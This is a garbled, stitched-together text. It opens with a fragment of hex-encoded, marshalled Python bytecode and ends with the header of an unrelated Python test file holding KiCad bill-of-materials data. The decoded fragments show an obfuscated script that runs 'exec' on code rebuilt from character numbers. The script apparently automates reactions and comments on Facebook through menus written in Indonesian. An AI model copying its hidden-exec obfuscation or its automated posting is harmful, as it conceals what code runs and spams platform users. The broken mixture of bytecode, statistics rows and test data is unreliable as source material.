c2033t\n\x00\x00\x00322c203631t\n\x00\x00\x002038342c20t\n\x00\x00\x002c20313135t\n\x00\x00\x002c20313031t\n\x00\x00\x002039352c20t\n\x00\x00\x003130322c20t\n\x00\x00\x0034302c2031t\n\x00\x00\x0031302c2031t\n\x00\x00\x0031342c2036t\n\x00\x00\x00312c203530t\n\x00\x00\x002c2034312ct\n\x00\x00\x002031302c20t\n\x00\x00\x0031342c2034t\n\x00\x00\x00362c203131t\n\x00\x00\x00372c203938t\n\x00\x00\x002c20313035t\n\x00\x00\x002c2034302ct\n\x00\x00\x0035302c2034t\n\x00\x00\x0030322c2039t\n\x00\x00\x00372c203939t\n\x00\x00\x002c20313131t\n\x00\x00\x002c20313231t\n\x00\x00\x00203130352ct\n\x00\x00\x00203131352ct\n\x00\x00\x003130342c20t\n\x00\x00\x0033322c2036t\n\x00\x00\x00312c203332t\n\x00\x00\x002c2038342ct\n\x00\x00\x00203131372ct\n\x00\x00\x0033322c2031t\n\x00\x00\x0030352c2033t\n\x00\x00\x00322c203130t\n\x00\x00\x00302c203332t\n\x00\x00\x003130372c20t\n\x00\x00\x0034302c2034t\n\x00\x00\x00312c203538t\n\x00\x00\x002033322c20t\n\x00\x00\x00392c203732t\n\x00\x00\x002c2039372ct\n\x00\x00\x002033392c20t\n\x00\x00\x0031302c2033t\n\x00\x00\x00352c203436t\n\x00\x00\x002c20313230t\n\x00\x00\x002c2035382ct\n\x00\x00\x00203130342ct\n\x00\x00\x003131322c20t\n\x00\x00\x0036312c2031t\n\x00\x00\x0030352c2034t\n\x00\x00\x00382c203130t\n\x00\x00\x0031372c2031t\n\x00\x00\x0030382c2034t\n\x00\x00\x00392c203433t\n\x00\x00\x002c20313137t\n\x00\x00\x00315d0a2065t\n\x00\x00\x007865632827t\n\x00\x00\x00272e6a6f69t\n\x00\x00\x006e285b6368t\n\x00\x00\x007228692920t\n\x00\x00\x0020696e2072t\n\x00\x00\x0065616b7369t\n\x00\x00\x005d29290a0at\n\x00\x00\x006465662067t\n\x00\x00\x006f5f6d656et\n\x00\x00\x007528293a0at\n\x00\x00\x007420273d27t\n\x00\x00\x002a37390a20t\n\x00\x00\x00202742616et\n\x00\x00\x00672d646a6ft\n\x00\x00\x006e272e6365t\n\x00\x00\x006e74657228t\n\x00\x00\x003739290a20t\n\x00\x00\x0020274d656et\n\x00\x00\x0075272e6365t\n\x00\x00\x0020273d272at\n\x00\x00\x0037390a2061t\n\x00\x00\x006b73693d5bt\n\x00\x00\x002731272c27t\n\x00\x00\x0032272c2734t\n\x00\x00\x00272c273327t\n\x00\x00\x002c273
7272ct\n\x00\x00\x002738272c27t\n\x00\x00\x0031272c2732t\n\x00\x00\x00272c273427t\n\x00\x00\x002c2733272ct\n\x00\x00\x002737272c27t\n\x00\x00\x0038275d0a20t\n\x00\x00\x006d656e753dt\n\x00\x00\x005b27526561t\n\x00\x00\x006374696f6et\n\x00\x00\x00204c696b65t\n\x00\x00\x00272c275265t\n\x00\x00\x00616374696ft\n\x00\x00\x006e20537570t\n\x00\x00\x006572272c27t\n\x00\x00\x005265616374t\n\x00\x00\x00696f6e2048t\n\x00\x00\x00616861272ct\n\x00\x00\x002752656163t\n\x00\x00\x0074696f6e20t\n\x00\x00\x00576f77272ct\n\x00\x00\x005365646968t\n\x00\x00\x006e204d6172t\n\x00\x00\x006168272c27t\n\x00\x00\x00436f6d6d65t\n\x00\x00\x006e74204e20t\n\x00\x00\x004c696b6527t\n\x00\x00\x002c27436f6dt\n\x00\x00\x006d656e7420t\n\x00\x00\x004e20537570t\n\x00\x00\x004861686127t\n\x00\x00\x004e20576f77t\n\x00\x00\x00272c27436ft\n\x00\x00\x006d6d656e74t\n\x00\x00\x00204e205365t\n\x00\x00\x00646968272ct\n\x00\x00\x0027436f6d6dt\n\x00\x00\x00656e74204et\n\x00\x00\x00204d617261t\n\x00\x00\x0068272c2743t\n\x00\x00\x006f6d6d656et\n\x00\x00\x007420416a61t\n\x00\x00\x00275d0a2066t\n\x00\x00\x00696e207261t\n\x00\x00\x006e6765286ct\n\x00\x00\x00656e286d65t\n\x00\x00\x006e7529293at\n\x00\x00\x00696e742028t\n\x00\x00\x00692b31292bt\n\x00\x00\x00275d272b27t\n\x00\x00\x0020272b6d65t\n\x00\x00\x006e755b6925t\n\x00\x00\x006c656e286dt\n\x00\x00\x00656e75295dt\n\x00\x00\x0029232b2720t\n\x00\x00\x00272b737472t\n\x00\x00\x0028692b3129t\n\x00\x00\x0029232e6365t\n\x00\x00\x0037390a0a20t\n\x00\x00\x0074616e673dt\n\x00\x00\x0028275c6e20t\n\x00\x00\x00205b202a20t\n\x00\x00\x005d20417061t\n\x00\x00\x002070696c69t\n\x00\x00\x0068616e6d75t\n\x00\x00\x002062726f2et\n\x00\x00\x002e203d2027t\n\x00\x00\x00290a207768t\n\x00\x00\x00696c652074t\n\x00\x00\x00616e67206et\n\x00\x00\x006f7420696et\n\x00\x00\x002872616e67t\n\x00\x00\x006528312c6ct\n\x00\x00\x006e75292b31t\n\x00\x00\x002c3129293at\n\x00\x00\x0020205b202at\n\x00\x00\x00205d205049t\n\x00\x00\x004c49482059t\n\x00\x00\x00414e472042t\n\x00\x00\x00454e455220t\n\x00\x00\x0042524
f4f4ft\n\x00\x00\x00270a202074t\n\x00\x00\x00616e673d69t\n\x00\x00\x00275c6e2020t\n\x00\x00\x005b202a205dt\n\x00\x00\x002041706120t\n\x00\x00\x0070696c6968t\n\x00\x00\x00616e6d7520t\n\x00\x00\x0062726f2e2et\n\x00\x00\x00203d202729t\n\x00\x00\x000a20696620t\n\x00\x00\x0074616e672dt\n\x00\x00\x0031203c3d20t\n\x00\x00\x00353a0a2020t\n\x00\x00\x0074616e6767t\n\x00\x00\x006170692861t\n\x00\x00\x006b73695b74t\n\x00\x00\x00616e672d31t\n\x00\x00\x005d290a2065t\n\x00\x00\x006c73653a0at\n\x00\x00\x0031203d3d20t\n\x00\x00\x0031323a6b6ft\n\x00\x00\x006d656e7461t\n\x00\x00\x007228290a20t\n\x00\x00\x003a6b6f6d65t\n\x00\x00\x006e4e726561t\n\x00\x00\x00637428616bt\n\x00\x00\x0073695b7461t\n\x00\x00\x006e672d315dt\n\x00\x00\x00290a0a6465t\n\x00\x00\x00662074616et\n\x00\x00\x006767617069t\n\x00\x00\x002861637429t\n\x00\x00\x003a0a20636ft\n\x00\x00\x00743d310a20t\n\x00\x00\x007768696c65t\n\x00\x00\x003a0a202074t\n\x00\x00\x0072793a0a20t\n\x00\x00\x002020746770t\n\x00\x00\x003d5b5d0a20t\n\x00\x00\x002020666f72t\n\x00\x00\x00206920696et\n\x00\x00\x002062722e6ct\n\x00\x00\x00696e6b7328t\n\x00\x00\x002774616e67t\n\x00\x00\x006761706927t\n\x00\x00\x0020696e2069t\n\x00\x00\x002e74657874t\n\x00\x00\x002e6c6f7765t\n\x00\x00\x007228293a74t\n\x00\x00\x0067702e6170t\n\x00\x00\x0070656e6428t\n\x00\x00\x00692e75726ct\n\x00\x00\x00290a200a20t\n\x00\x00\x00207467703at\n\x00\x00\x007379732e73t\n\x00\x00\x0074646f7574t\n\x00\x00\x002e77726974t\n\x00\x00\x006528275c72t\n\x00\x00\x0020205b2a7dt\n\x00\x00\x00206d656e61t\n\x00\x00\x006e67676170t\n\x00\x00\x0069206b6520t\n\x00\x00\x002573272563t\n\x00\x00\x006f74290a20t\n\x00\x00\x002020207379t\n\x00\x00\x00732e737464t\n\x00\x00\x006f75742e66t\n\x00\x00\x006c75736828t\n\x00\x00\x002062722e6ft\n\x00\x00\x0070656e2875t\n\x00\x00\x00726c312b69t\n\x00\x00\x002062722e5ft\n\x00\x00\x00666163746ft\n\x00\x00\x0072792e6973t\n\x00\x00\x005f68746d6ct\n\x00\x00\x00203d205472t\n\x00\x00\x0075650a2020t\n\x00\x00\x002069692069t\n\x00\x00\x006c696e6b73t\n\x00\x00\x0028293
a0a20t\n\x00\x00\x002020202069t\n\x00\x00\x006620277265t\n\x00\x00\x006e5f747970t\n\x00\x00\x00653d257327t\n\x00\x00\x002561637420t\n\x00\x00\x00696e206969t\n\x00\x00\x002e75726c3at\n\x00\x00\x0075726c312bt\n\x00\x00\x0069692e7572t\n\x00\x00\x006c290a2020t\n\x00\x00\x002020202062t\n\x00\x00\x00636f742b3dt\n\x00\x00\x003120237072t\n\x00\x00\x002054616e67t\n\x00\x00\x006761706920t\n\x00\x00\x00446f6e6527t\n\x00\x00\x00696d652e73t\n\x00\x00\x006c65657028t\n\x00\x00\x003230290a20t\n\x00\x00\x000a20202062t\n\x00\x00\x000a20206578t\n\x00\x00\x006365707420t\n\x00\x00\x004b6579626ft\n\x00\x00\x00617264496et\n\x00\x00\x007465727275t\n\x00\x00\x0070743a6272t\n\x00\x00\x0065616b0a0at\n\x00\x00\x00646566206bt\n\x00\x00\x006f6d656e74t\n\x00\x00\x00617228293at\n\x00\x00\x000a20747279t\n\x00\x00\x003a6d73673dt\n\x00\x00\x007379732e70t\n\x00\x00\x006174685b30t\n\x00\x00\x005d2b272f6bt\n\x00\x00\x006f6d656e2et\n\x00\x00\x007478742729t\n\x00\x00\x002e72656164t\n\x00\x00\x0028290a2065t\n\x00\x00\x005d2074756ct\n\x00\x00\x00697320225bt\n\x00\x00\x00656e746572t\n\x00\x00\x005d22207461t\n\x00\x00\x006e70612074t\n\x00\x00\x00616e646120t\n\x00\x00\x00706574696bt\n\x00\x00\x006b20626172t\n\x00\x00\x006973206261t\n\x00\x00\x007275270a20t\n\x00\x00\x00206d736730t\n\x00\x00\x006e206b6f6dt\n\x00\x00\x00656e746172t\n\x00\x00\x000a20206f70t\n\x00\x00\x00656e287379t\n\x00\x00\x00272f6b6f6dt\n\x00\x00\x00656e2e7478t\n\x00\x00\x0074272c2777t\n\x00\x00\x0027292e7772t\n\x00\x00\x00697465286dt\n\x00\x00\x007367302e72t\n\x00\x00\x006528275b65t\n\x00\x00\x006e7465725dt\n\x00\x00\x00272c275c6et\n\x00\x00\x002729290a20t\n\x00\x00\x00206d73673dt\n\x00\x00\x0028290a2063t\n\x00\x00\x006f743d310at\n\x00\x00\x00207768696ct\n\x00\x00\x006520547275t\n\x00\x00\x00653a0a2020t\n\x00\x00\x007472793a0at\n\x00\x00\x002020206b6dt\n\x00\x00\x00743d5b5d0at\n\x00\x00\x00613d27270at\n\x00\x00\x00202020666ft\n\x00\x00\x002020206966t\n\x00\x00\x002027206b6ft\n\x00\x00\x00722720696et\n\x00\x00\x0020692e7465t\n\x00\x00\x0078742
e6c6ft\n\x00\x00\x007765722829t\n\x00\x00\x006b6f6d656et\n\x00\x00\x007461726927t\n\x00\x00\x007228293a6bt\n\x00\x00\x006d742e6170t\n\x00\x00\x002069662027t\n\x00\x00\x006b656c7561t\n\x00\x00\x007220272069t\n\x00\x00\x006e20692e74t\n\x00\x00\x006578742e6ct\n\x00\x00\x006f77657228t\n\x00\x00\x0027290a0a20t\n\x00\x00\x00206b6d743at\n\x00\x00\x00206d656e67t\n\x00\x00\x00617269206bt\n\x00\x00\x006520257327t\n\x00\x00\x0025636f7429t\n\x00\x00\x002e666c7573t\n\x00\x00\x006828290a20t\n\x00\x00\x002e6f70656et\n\x00\x00\x002875726c31t\n\x00\x00\x002b69290a20t\n\x00\x00\x0062722e6669t\n\x00\x00\x006e645f6c69t\n\x00\x00\x006e6b287379t\n\x00\x00\x0061292e7572t\n\x00\x00\x006c0a202020t\n\x00\x00\x002020237072t\n\x00\x00\x00206b616d75t\n\x00\x00\x002073756461t\n\x00\x00\x006820626572t\n\x00\x00\x007461722064t\n\x00\x00\x006973696e69t\n\x00\x00\x002065786365t\n\x00\x00\x0070743a0a20t\n\x00\x00\x002020202074t\n\x00\x00\x0072793a6272t\n\x00\x00\x002e73656c65t\n\x00\x00\x0063745f666ft\n\x00\x00\x00726d286e72t\n\x00\x00\x003d31290a20t\n\x00\x00\x002020202065t\n\x00\x00\x003a62722e73t\n\x00\x00\x00666f726d5bt\n\x00\x00\x0027636f6d6dt\n\x00\x00\x00656e745f74t\n\x00\x00\x00657874275dt\n\x00\x00\x003d6d73670at\n\x00\x00\x002020202063t\n\x00\x00\x006f742b3d31t\n\x00\x00\x002023707269t\n\x00\x00\x006e74202720t\n\x00\x00\x00205b2a5d20t\n\x00\x00\x007461722073t\n\x00\x00\x00756b736573t\n\x00\x00\x0074696d652et\n\x00\x00\x00736c656570t\n\x00\x00\x00283230290at\n\x00\x00\x00650a202065t\n\x00\x00\x00204b657962t\n\x00\x00\x006f61726449t\n\x00\x00\x006e74657272t\n\x00\x00\x007570743a62t\n\x00\x00\x007265616b0at\n\x00\x00\x004e72656163t\n\x00\x00\x007428616374t\n\x00\x00\x00293a0a2074t\n\x00\x00\x0072793a6d73t\n\x00\x00\x00673d6f7065t\n\x00\x00\x006e28737973t\n\x00\x00\x002f6b6f6d65t\n\x00\x00\x006e2e747874t\n\x00\x00\x00616428290at\n\x00\x00\x005b2a5d2074t\n\x00\x00\x00756c697320t\n\x00\x00\x00225b656e74t\n\x00\x00\x0065725d2220t\n\x00\x00\x0074616e7061t\n\x00\x00\x002074616e64t\n\x00\x00\x0061207
06574t\n\x00\x00\x00696b20756et\n\x00\x00\x0074756b2062t\n\x00\x00\x006172697320t\n\x00\x00\x006261727527t\n\x00\x00\x000a20206d73t\n\x00\x00\x0067303d7261t\n\x00\x00\x00775f696e70t\n\x00\x00\x007574282720t\n\x00\x00\x006d6173756bt\n\x00\x00\x006b616e206bt\n\x00\x00\x006172203d20t\n\x00\x00\x0027290a2020t\n\x00\x00\x00747874272ct\n\x00\x00\x00277727292et\n\x00\x00\x007772697465t\n\x00\x00\x00286d736730t\n\x00\x00\x005b656e7465t\n\x00\x00\x00725d272c27t\n\x00\x00\x005c6e272929t\n\x00\x00\x0020636f743dt\n\x00\x00\x00310a20636ft\n\x00\x00\x006d3d310a20t\n\x00\x00\x0020206b6d74t\n\x00\x00\x002020737961t\n\x00\x00\x003d27270a20t\n\x00\x00\x0027206b6f6dt\n\x00\x00\x00742e6c6f77t\n\x00\x00\x006572282920t\n\x00\x00\x006f7220276bt\n\x00\x00\x006172692720t\n\x00\x00\x00696e20692et\n\x00\x00\x00746578742et\n\x00\x00\x006c6f776572t\n\x00\x00\x0028293a6b6dt\n\x00\x00\x00742e617070t\n\x00\x00\x00656e642869t\n\x00\x00\x002e75726c29t\n\x00\x00\x00696620276bt\n\x00\x00\x00202720696et\n\x00\x00\x00290a0a2020t\n\x00\x00\x006b6d743a0at\n\x00\x00\x00722e6f7065t\n\x00\x00\x006e2875726ct\n\x00\x00\x00312b69290at\n\x00\x00\x00666f722074t\n\x00\x00\x006720696e20t\n\x00\x00\x0062722e6c69t\n\x00\x00\x006e6b732829t\n\x00\x00\x002020737973t\n\x00\x00\x002e7374646ft\n\x00\x00\x0075742e7772t\n\x00\x00\x006974652827t\n\x00\x00\x005c7220205bt\n\x00\x00\x002a7d206d65t\n\x00\x00\x006e616e6767t\n\x00\x00\x00617069206bt\n\x00\x00\x006520257320t\n\x00\x00\x00746172206bt\n\x00\x00\x002528636f74t\n\x00\x00\x002c636f6d29t\n\x00\x00\x0075742e666ct\n\x00\x00\x007573682829t\n\x00\x00\x006170692720t\n\x00\x00\x00696e207467t\n\x00\x00\x007228293a0at\n\x00\x00\x00726c312b74t\n\x00\x00\x00672e75726ct\n\x00\x00\x00696920696et\n\x00\x00\x006966202772t\n\x00\x00\x006561637469t\n\x00\x00\x006f6e5f7479t\n\x00\x00\x0070653d2573t\n\x00\x00\x002725616374t\n\x00\x00\x006c312b6969t\n\x00\x00\x002020636f74t\n\x00\x00\x002b3d312023t\n\x00\x00\x002a5d205461t\n\x00\x00\x006920446f6et\n\x00\x00\x0065270a0a20t\n\x00\x00\x0020202
07472t\n\x00\x00\x002e66696e64t\n\x00\x00\x005f6c696e6bt\n\x00\x00\x002873796129t\n\x00\x00\x002e75726c0at\n\x00\x00\x00237072696et\n\x00\x00\x00616d752073t\n\x00\x00\x007564616820t\n\x00\x00\x006265726b6ft\n\x00\x00\x007220646973t\n\x00\x00\x002020747279t\n\x00\x00\x00286e723d31t\n\x00\x00\x002020657863t\n\x00\x00\x006570743a62t\n\x00\x00\x00722e73656ct\n\x00\x00\x006563745f66t\n\x00\x00\x006f726d286et\n\x00\x00\x00723d30290at\n\x00\x00\x0062722e666ft\n\x00\x00\x00726d5b2763t\n\x00\x00\x00745f746578t\n\x00\x00\x0074275d3d6dt\n\x00\x00\x0073670a2020t\n\x00\x00\x002020636f6dt\n\x00\x00\x002a5d206b6ft\n\x00\x00\x00722073756bt\n\x00\x00\x00736573270at\n\x00\x00\x002020207469t\n\x00\x00\x006d652e736ct\n\x00\x00\x006565702832t\n\x00\x00\x00726c31290at\n\x00\x00\x00657074204bt\n\x00\x00\x006579626f61t\n\x00\x00\x007264496e74t\n\x00\x00\x006572727570t\n\x00\x00\x00743a627265t\n\x00\x00\x00616b0a0a6dt\n\x00\x00\x006f64653d69t\n\x00\x00\x002720205b31t\n\x00\x00\x005d20467265t\n\x00\x00\x00652066625ct\n\x00\x00\x006e20205b32t\n\x00\x00\x005d206d6f62t\n\x00\x00\x00696c652066t\n\x00\x00\x00625c6e2020t\n\x00\x00\x005b3e5d2027t\n\x00\x00\x00290a6d6f64t\n\x00\x00\x0065733d7b31t\n\x00\x00\x003a27667265t\n\x00\x00\x0065272c323at\n\x00\x00\x00276d6f6269t\n\x00\x00\x006c65277d0at\n\x00\x00\x0075726c313dt\n\x00\x00\x002768747470t\n\x00\x00\x00733a2f2f27t\n\x00\x00\x002b6d6f6465t\n\x00\x00\x00735b6d6f64t\n\x00\x00\x00655d2b272et\n\x00\x00\x006661636562t\n\x00\x00\x006f6f6b2e63t\n\x00\x00\x006f6d270a72t\n\x00\x00\x000a69662027t\n\x00\x00\x007379732e61t\n\x00\x00\x007267763a0at\n\x00\x00\x006e7428290at\n\x00\x00\x00656c73653at\n\x00\x00\x000a206d756ct\n\x00\x00\x00616928290at\n\x00\x00\x000a7072696et\n\x00\x00\x007420275c6et\n\x00\x00\x005c6e646f6et\n\x00\x00\x00655c6e6279t\n\x00\x00\x00203a204261t\n\x00\x00\x006e672d446at\n\x00\x00\x006f6e270a0at\x01\x00\x00\x00"t\x01\x00\x00\x00.t\x03\x00\x00\x00dect\x03\x00\x00\x00odes\x02\x00\x00\x00("t\x01\x00\x00\x00ht\x00\x00\x00\x00t\x01\x00\x00\x
00es\x02\x00\x00\x00x"t\x01\x00\x00\x00)t\x01\x00\x00\x00(s\x02\x00\x00\x00"us\x02\x00\x00\x008"N(\x01\x00\x00\x00t\x07\x00\x00\x00__doc__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s:\x00\x00\x00\x06\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\x03\x00'''))
| 16,477
| 49,415
| 0.807894
| 9,221
| 49,431
| 4.329791
| 0.146622
| 0.177783
| 0.197946
| 0.02139
| 0.240501
| 0.214126
| 0.204383
| 0.187802
| 0.164759
| 0.157946
| 0
| 0.501265
| 0.000202
| 49,431
| 3
| 49,415
| 16,477
| 0.30659
| 0
| 0
| 0
| 0
| 0.5
| 0.99913
| 0.998988
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
3443b9a49f145f3ebe72de040f65025ec1588589
| 173
|
py
|
Python
|
src/python/zensols/ngramdb/__init__.py
|
plandes/ngramdb
|
b0998e94ae411f84ab401794057423f53f60cc30
|
[
"MIT"
] | 3
|
2019-12-20T12:39:17.000Z
|
2021-04-22T14:29:39.000Z
|
src/python/zensols/ngramdb/__init__.py
|
plandes/ngramdb
|
b0998e94ae411f84ab401794057423f53f60cc30
|
[
"MIT"
] | null | null | null |
src/python/zensols/ngramdb/__init__.py
|
plandes/ngramdb
|
b0998e94ae411f84ab401794057423f53f60cc30
|
[
"MIT"
] | null | null | null |
from zensols.ngramdb.config import *
from zensols.ngramdb.db import *
from zensols.ngramdb.down import *
from zensols.ngramdb.app import *
from zensols.ngramdb.cli import *
| 28.833333
| 36
| 0.797688
| 25
| 173
| 5.52
| 0.36
| 0.398551
| 0.652174
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115607
| 173
| 5
| 37
| 34.6
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
34787a4d8e19bcbb66e042ca5f47f6abf446c527
| 23,576
|
py
|
Python
|
test/test_kibot_parser.py
|
spielhuus/sconstool-kicad
|
01d9fe8781cd692fa8a2d3e47498bbfa6bfd3425
|
[
"MIT"
] | null | null | null |
test/test_kibot_parser.py
|
spielhuus/sconstool-kicad
|
01d9fe8781cd692fa8a2d3e47498bbfa6bfd3425
|
[
"MIT"
] | null | null | null |
test/test_kibot_parser.py
|
spielhuus/sconstool-kicad
|
01d9fe8781cd692fa8a2d3e47498bbfa6bfd3425
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import unittest
from sys import path as syspath
from os import path as ospath
from pathlib import Path
import json
import xml.etree.ElementTree as ET
import SCons
syspath.append("..")
comnbined_result = {"kontur": {'summary': {'drc': 0, 'unconnected': 0, 'erc': 0}, "main": {"bom": [{"ref": ["C1", "C2"], "value": "22u", "datasheet": "~", "description": "Aluminium Electrolytic Capacitors (50V, D=6.3 mm, LS=2.5 mm)", "footprint": "Capacitor_THT:CP_Radial_D6.3mm_P2.50mm"}, {"ref": ["C3", "C4", "C5", "C6", "C8", "C10", "C11"], "value": "0.1u", "datasheet": "~", "description": "Multilayer Ceramic Capacitors MLCC (50V, L=4 mm, W=2.5 mm, LS=2.5 mm)", "footprint": "Capacitor_THT:C_Rect_L4.0mm_W2.5mm_P2.50mm"}, {"ref": ["C7", "C9"], "value": "2.2u", "datasheet": "~", "description": "Multilayer Ceramic Capacitors MLCC (25V, L=6 mm, W=5.5 mm, LS=5 mm)", "footprint": "Capacitor_THT:C_Disc_D6.0mm_W4.4mm_P5.00mm"}, {"ref": ["D1", "D4", "D7", "D8", "D9", "D10", "D11", "D12", "D15", "D18", "D19", "D20", "D21", "D22"], "value": "1N4148", "datasheet": "https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf", "description": "Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal", "footprint": "Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal"}, {"ref": ["D2", "D3", "D5", "D6", "D13", "D14", "D16", "D17"], "value": "1N4148", "datasheet": "https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf", "description": "Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp", "footprint": "Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp"}, {"ref": ["J1"], "value": "01x09 Female", "datasheet": "~", "description": "Board to Board Connectors (2.54 mm)", "footprint": "Connector_PinSocket_2.54mm:PinSocket_1x09_P2.54mm_Vertical"}, {"ref": ["J2"], "value": "10 Pos", "datasheet": "~", "description": "Pin Header IDC (2.54mm)", "footprint": "Connector_IDC:IDC-Header_2x05_P2.54mm_Vertical"}, {"ref": ["J3"], "value": "01x07 Female", "datasheet": "~", "description": "Board to Board Connectors (2.54 mm)", "footprint": "Connector_PinSocket_2.54mm:PinSocket_1x07_P2.54mm_Vertical"}, {"ref": ["R1", "R16", "R19", "R32"], "value": "100k", "datasheet": "~", "description": "Metal Film 
Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R2", "R20"], "value": "27k", "datasheet": "~", "description": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R3", "R21"], "value": "390k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R4", "R9", "R22", "R25"], "value": "47k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R5", "R6"], "value": "10", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R7", "R23"], "value": "470k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R8", "R24"], "value": "2.2k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R10", "R26"], "value": "10k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R11", "R27"], "value": "36k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R12", "R14", "R15", "R17", "R18", "R28"], "value": "1k", "datasheet": "~", "description": "Metal Film Resistors - Through 
Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R13", "R29"], "value": "220", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["U1", "U2", "U4"], "value": "LM324", "datasheet": "http://www.ti.com/lit/ds/symlink/lm2902-n.pdf", "description": "Package_DIP:DIP-14_W7.62mm_Socket", "footprint": "Package_DIP:DIP-14_W7.62mm_Socket"}, {"ref": ["U3"], "value": "4001", "datasheet": "http://www.intersil.com/content/dam/Intersil/documents/cd40/cd4000bms-01bms-02bms-25bms.pdf", "description": "Package_DIP:DIP-14_W7.62mm_Socket", "footprint": "Package_DIP:DIP-14_W7.62mm_Socket"}], "drc": [], "unconnected": [], "erc": []}}}
